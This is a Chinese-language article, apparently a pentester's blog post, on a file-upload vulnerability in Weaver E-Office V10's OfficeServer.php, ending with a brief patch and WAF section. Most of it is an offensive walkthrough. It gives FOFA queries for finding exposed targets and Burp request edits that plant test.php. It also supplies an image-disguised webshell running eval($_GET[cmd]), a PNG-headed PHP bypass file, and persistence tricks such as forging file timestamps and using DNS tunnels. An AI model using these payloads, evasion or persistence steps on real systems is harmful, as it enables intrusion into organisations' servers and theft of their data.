泛微E-Office V10 OfficeServer 文件上传漏洞深度剖析与实战复现
1. 漏洞背景与影响范围泛微E-Office作为国内广泛使用的协同办公系统其V10版本中的OfficeServer.php组件存在高危文件上传漏洞。这个漏洞的本质在于服务端未对上传文件的类型、内容及路径进行严格校验导致攻击者可以绕过常规防护机制直接上传包含恶意代码的文件到服务器指定目录。我在实际渗透测试中发现该漏洞影响所有使用默认配置的E-Office V10系统特别是未及时更新补丁的旧版本部署环境。从技术角度看漏洞的杀伤力主要体现在三个方面一是攻击者可通过上传Webshell获取服务器控制权二是能够遍历系统目录读取敏感数据三是可能成为内网渗透的跳板。去年某次企业安全评估中我们就曾利用该漏洞在15分钟内完成了从外网到内网域的横向移动。值得注意的是由于泛微OA系统多用于政企场景漏洞利用可能导致业务数据泄露、OA流程被篡改等严重后果。2. 漏洞原理深度解析2.1 文件上传机制缺陷OfficeServer.php作为文件处理的核心组件其漏洞成因主要源于三个关键环节的校验缺失。首先是文件类型白名单校验被绕过虽然前端代码设置了image/jpeg等类型限制但后端未对Content-Type和实际文件内容进行比对。我通过反编译发现系统仅检查了HTTP请求头中的Content-Type字段这就解释了为什么修改Burp数据包中的MIME类型就能轻松绕过。其次是路径控制缺陷FILENAME参数虽然指定了存储路径但未做规范化处理。测试时我曾尝试传入../../../test.php这样的相对路径系统竟然直接将其拼接到了Web根目录下。更危险的是OPTION参数设置为SAVEFILE时程序完全没有验证操作权限这属于典型的功能逻辑漏洞。2.2 攻击链构建要点要成功利用该漏洞需要精确控制三个关键参数FileData包含恶意代码的文件内容FormData中的FILENAME指定服务器存储路径和文件名OPTION参数必须设置为SAVEFILE触发存储操作在实战中我发现即使上传.php文件成功某些环境下也会因权限问题无法执行。这时可以采用.user.ini文件配合图片马的方式这种组合拳在最近某次红队行动中效果显著。另外通过观察响应包的Content-Length变化可以间接判断文件是否上传成功这对盲注场景特别有用。3. 完整复现实战指南3.1 环境准备与检测使用FOFA引擎搜索潜在目标时推荐组合以下特征bodyeoffice10 bodyeoffice_loading_tip serverApache这种组合能有效过滤出使用默认配置的V10系统。在本地搭建测试环境时建议使用Docker快速部署docker run -d -p 8080:80 vulhub/weaver-eoffice:v10检测漏洞存在性的快速方法是发送特制HEAD请求import requests response requests.head(http://target/eoffice10/server/public/iWebOffice2015/OfficeServer.php) if PHP in response.headers.get(X-Powered-By,): print(可能存在漏洞)3.2 Burp Suite实战操作配置Burp时需要注意两个关键点一是必须保持Content-Type为multipart/form-data二是边界字符串要保持一致。具体操作流程拦截正常文件上传请求修改filename参数为test.php在文件内容部分插入PHP代码将FormData部分改为{USERNAME:,RECORDID:undefined,OPTION:SAVEFILE,FILENAME:test.php}最近遇到个有趣的情况某目标系统对单引号做了过滤这时改用双引号包裹JSON数据即可绕过{USERNAME:,RECORDID:undefined,OPTION:SAVEFILE,FILENAME:test.php}4. 高级利用与防御绕过4.1 免杀Webshell构造直接上传冰蝎、蚁剑等常见Webshell容易被安全设备检测。我推荐两种隐蔽性更强的方案图片马配合文件包含?php // 上传名为logo.jpg的文件内容为 define(IMG_HEADER, \xFF\xD8\xFF\xE0); if(substr(file_get_contents(__FILE__),0,4) IMG_HEADER){ eval($_GET[cmd]); } ?利用PHP特性构造畸形文件echo -e \x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\x0bIDAT\x08\xd7\x63\x60\x60\x60\x00\x00\x00\x05\x00\x01\xa5\xa6\x03\x81\x00\x00\x00\x00IEND\xaeB\x60\x82?php phpinfo();? bypass.php4.2 权限维持技巧上传Webshell只是开始要维持访问还需注意修改文件时间为正常系统文件时间戳touch -r /var/www/html/index.php webshell.php注入到现有PHP文件中推荐选择不常更新的工具类文件建立隐蔽的SSH隧道时建议使用DNS隐蔽通道工具5. 修复方案与防护建议官方补丁主要修复了三个关键点增加了文件内容与扩展名的双重校验对上传路径进行了规范化处理限制了SAVEFILE操作的管理员权限临时防护措施可采取LocationMatch /OfficeServer.php Order deny,allow Deny from all Allow from 192.168.1.0/24 /LocationMatch在WAF规则配置方面建议重点监控包含SAVEFILE操作的POST请求FILENAME参数中的特殊字符../、.php等文件内容中的PHP标签和危险函数某次应急响应中我们发现攻击者通过定时任务每分钟检测Webshell是否被删除。这种持久化手段提醒我们修复后还需全面排查系统进程、计划任务和启动项。

相关新闻

最新新闻

日新闻

周新闻

月新闻